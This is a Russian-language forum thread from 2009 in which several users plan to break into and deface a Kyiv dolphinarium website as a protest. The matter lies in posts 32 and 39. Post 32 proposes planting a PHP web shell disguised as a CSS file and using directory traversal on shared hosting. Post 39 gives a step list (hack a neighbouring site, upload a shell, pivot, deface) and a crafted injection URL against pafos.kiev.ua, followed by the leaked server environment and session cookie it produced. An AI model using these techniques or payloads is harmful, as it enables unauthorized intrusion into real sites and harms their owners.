Дельфиний форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Дельфиний форум » Новости » Мдя..


Мдя..

Сообщений 31 страница 39 из 39

31

Дельфин Экко написал(а):

Люмос, ну это же инфа о домене kiev.ua, т.к. о поддомене whois никакой инфы не дает, т.к. поддомены не региструются как домены 2-го уровня. должно быть так

Да неужели? Если бы такая инфа не предоставлялась то он бы ниче не нашёл в БД.
Вот тебе запрос на киев
% This is the Ukrainian Whois query server #I.
% Rights restricted by copyright.
%

% % .UA whois
% Domain Record:
% =============
domain: kiev.ua

Lumos написал(а):

domain: delfini.kiev.ua (+Организация)

remark: Public domain
remark: Kiev, Ukraine
admin-c: UADM15-UANIC
tech-c: HOST-UANIC
dom-public: YES
nserver: sns-pb.isc.org
nserver: mike.hostmaster.net.ua
nserver: ba1.ns.net.ua
nserver: golf.hostmaster.net.ua
nserver: ns.net.ua
nserver: ns-he.kolo.net
nserver: ho1.ns.kiev.ua
changed: ST101-UANIC 20081218093928
source: UANIC

% Glue Record:
% ===========
nserver: ho1.ns.kiev.ua
ip-addr: 195.47.253.2

% Administrative Contact:
% ======================
nic-handle: UADM15-UANIC
organization: kiev.ua Administrator Svitlana Tkachenko
address: Not Available
phone: +380 44 451-7456
e-mail:
org-id: N/A
mnt-by: NONE
changed: UADM15-UANIC 20080609130857
source: UANIC

% Technical Contact:
% =================
nic-handle: HOST-UANIC
organization: Hostmaster Ltd
organization: ппп "иПУФНБУФЕТ"
organization: фпч "иПУФНБКУФЕТ"
address: P.O.Box, 98
address: 04060 KIEV
address: UA
phone: +380 (44) 4517456
e-mail:
url: http://www.hostmaster.net.ua
org-id: 31306359
mnt-by: NONE
changed: LS76-UANIC 20080516134733
source: UANIC

% % .UA whois

Дельфин Экко написал(а):

да вот же адрес то! kievdelfini@gmail.com

Я в фидбэк не добрался )) Лень было
Summary:
Зоопарковцы заняли локацию в Киеве, заказали сайт у некой организации и сайт держат НЕ зоопарковцы, а работники из сей организации. Наврятли у них есть ключи. Так что вариант с фэйком можно в топку, если там конечно не сидит мега-ацкая блондинко.

P.S. Может быть я что-то путаю?

Отредактировано Lumos (2009-01-06 08:52:58)

32

http://www.ip-ping.ru/siteip/ - Единственный вариант. Может быть (скорее так и будет)  на одном аддр будет сидеть несколько виртуальных серверов. На каком-нибудь наверняка есть ошибка. Если сисадмин местный оказался ленивым и неограничил кое какие права - то можно без проблем "cd ../ cd delfini.kiev.ua/root". Дальнейший ход мысли думаю понятен.

Я просмотреть не могу из-за чертового DSL коннекта - не прогружается :(
P.S. прикольно исчо будет залить какой-нить global.css (<?php system($a) ?>) и сказать что css тоже php... админ наврятли заметит западло - так что в любой момент мона будет исчо раз подшутить ))

33

А если админ случайно наткнется на эту тему... http://forum.nov.ru/style_emoticons/default/lol.gif

Отредактировано Cheetah (2009-01-06 13:27:43)

34

Скажем ему: "Здрасти, Selam abi, Hi, Bonjour" http://www.kolobok.us/smiles/light_skin/hi.gif

Мне тоже интересно каковы будут его действия http://www.kolobok.us/smiles/big_standart/pleasantry.gif

Отредактировано Lumos (2009-01-06 17:25:02)

35

тогда мы его словим, в мешок и в речку)))

36

Я просмотреть не могу из-за чертового DSL коннекта - не прогружается :(

в чем именно проблема?
помогу чем смогу. Есть анонимные прокси

37

Дельфин Экко написал(а):

в чем именно проблема?
помогу чем смогу. Есть анонимные прокси

Проблема или в провайдере или в качестве телефонного кабеля )

38

Найдено сайтов: 19

   1. agro.ib.kiev.ua
   2. biometricacs.com
   3. curs.kiev.ua
   4. food.ib.kiev.ua
   5. icpua.com
   6. infokod.org
   7. kroliki.od.ua
   8. mebel.ib.kiev.ua
   9. pafos.kiev.ua
  10. torg.ib.kiev.ua
  11. wwwbarcocktail.com.ua
  12. wwwbiometricacs.com
  13. wwwdelfini.kiev.ua
  14. wwwib.kiev.ua
  15. wwwicpua.com
  16. wwwmilk.ua
  17. wwwuams.org.ua
  18. wwwuastore.biz
  19. zteel.com

:flag:

ОбхакайтесЬ)

39

Практически во всех сайтах используется модуль mod_rewrite Апача и фенички от фрэймворка Симфони (http://www.symfony-project.org/)

Проект опенсоурс. Я скачал у них исходники... но лазать там.. блин мне лень )) Мож тут мона SQL-инЪекцию сделать или даже инициализировать своим значением неинициализорованную переменную. Шаг действий прост.

1. Хакаем      - пафос.киев.уа.
2. Загружаем шелл.
3. Рассматриваем энвиромент сайта.
4. Переходим на дельфинов.киев.уа
5. ДЕФЕЙС в знак протеста!
6. Пьём пиво.

h ttp://pafos.kiev.ua/catalog/index/id/3/name/Вечерние наряды => h ttp://pafos.kiev.ua/catalog/index/id/0";%00die();/name/Вечерние наряды (два раза обратитесь к серверу с последним запросом)

---
cookie:
  symfony: 1faaa72a48245f5948ae058ede3839e8
env:
  APACHE_PID_FILE: /var/run/apache2.pid
  APACHE_RUN_GROUP: apache
  APACHE_RUN_USER: apache
  LANG: C
  PATH: /usr/local/bin:/usr/bin:/bin
  PWD: /
  SHLVL: 1
  _: /usr/sbin/apache2
files:
get:
post:
server:
  DOCUMENT_ROOT: /var/www/pafosm/pafos.kiev.ua
  GATEWAY_INTERFACE: CGI/1.1
  HTTP_ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  HTTP_ACCEPT_CHARSET: windows-1251,utf-8;q=0.7,*;q=0.7
  HTTP_ACCEPT_ENCODING: gzip,deflate
  HTTP_ACCEPT_LANGUAGE: ru,en-us;q=0.7,en;q=0.3
  HTTP_CONNECTION: keep-alive
  HTTP_COOKIE: symfony=1faaa72a48245f5948ae058ede3839e8
  HTTP_HOST: pafos.kiev.ua
  HTTP_KEEP_ALIVE: 300
  HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9) Gecko/2008052906 Firefox/3.0
  PATH: /usr/local/bin:/usr/bin:/bin
  PHP_SELF: /index.php
  QUERY_STRING:
  REDIRECT_STATUS: 200
  REDIRECT_UNIQUE_ID: SWXcaE1XwSYAAEQjgqIAAAAA
  REDIRECT_URL: /catalogs
  REMOTE_ADDR: 87.237.138.10
  REMOTE_PORT: 3527
  REQUEST_METHOD: GET
  REQUEST_TIME: 1231412328
  REQUEST_URI: /catalogs
  SCRIPT_FILENAME: /var/www/pafosm/pafos.kiev.ua/index.php
  SCRIPT_NAME: /index.php
  SERVER_ADDR: 77.87.193.38
  SERVER_ADMIN: support@mirohost.net
  SERVER_NAME: pafos.kiev.ua
  SERVER_PORT: 80
  SERVER_PROTOCOL: HTTP/1.1
  SERVER_SIGNATURE: |
   
Apache Server at pafos.kiev.ua Port 80

   
  SERVER_SOFTWARE: Apache
  UNIQUE_ID: SWXcaE1XwSYAAEQjgqIAAAAA
  argc: 0
  argv:
session:
  symfony/user/sfUser/attributes:
    symfony/user/sfUser/attributes:
      cats:
      types:
      sizes:
      tops:
  symfony/user/sfUser/authenticated:
  symfony/user/sfUser/credentials:
  symfony/user/sfUser/culture: en
  symfony/user/sfUser/lastRequest: 1231412327

symfony v.1.0.18 - php 5.2.6-5

*** Че-то я загнул. Идиотизм был замечен даже так http://pafos.kiev.ua/sfdgfgd
*ВНИМАНИЕ! Информация предоставлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия не ответственности не несут!

Отредактировано Lumos (2009-01-16 19:38:53)


Вы здесь » Дельфиний форум » Новости » Мдя..